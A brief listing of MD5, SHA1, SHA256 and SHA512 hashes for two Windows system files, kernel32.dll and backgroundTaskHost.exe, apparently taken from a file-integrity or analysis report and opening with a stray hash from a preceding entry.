SHA512 cbdf38944b7d7132e7c7448bc715e1e94b1a9a97a6108d90c44fd5637c19dbf39969ee69a170525a2c920b6cb67941f79e8ca818c3e4e2ffbbe3ea90fa0f7d7b

C:\Windows\System32\kernel32.dll

MD5 1b6d9bd5677f3fe825a7c393ec60dc64
SHA1 095de4ddb7bb0b3a20918ce78083382ca2eef872
SHA256 e5988a4597838f07fff021dd6c1653a8a459ed6caf2a63da95ec42ab49d37e0d
SHA512 9f1869acd9437f74f1b581e5256a2186b9e24c4e68984e58493224c0e575865d48175f14ec2255948d1dc0c79212c272b9ad514466f21bdcfe98b1d7d5f25798

C:\Windows\System32\backgroundTaskHost.exe

MD5 da7063b17dbb8bbb3015351016868006
SHA1 c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09
SHA256 20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50
SHA512 16a8e5aad8900cb2da6d2e06258563eff56b4022092a750c16da50496ec490d1b761d630135cdf313c0ef96d6f30cce09df9ebca0de96e854f2f901b34fd9d1f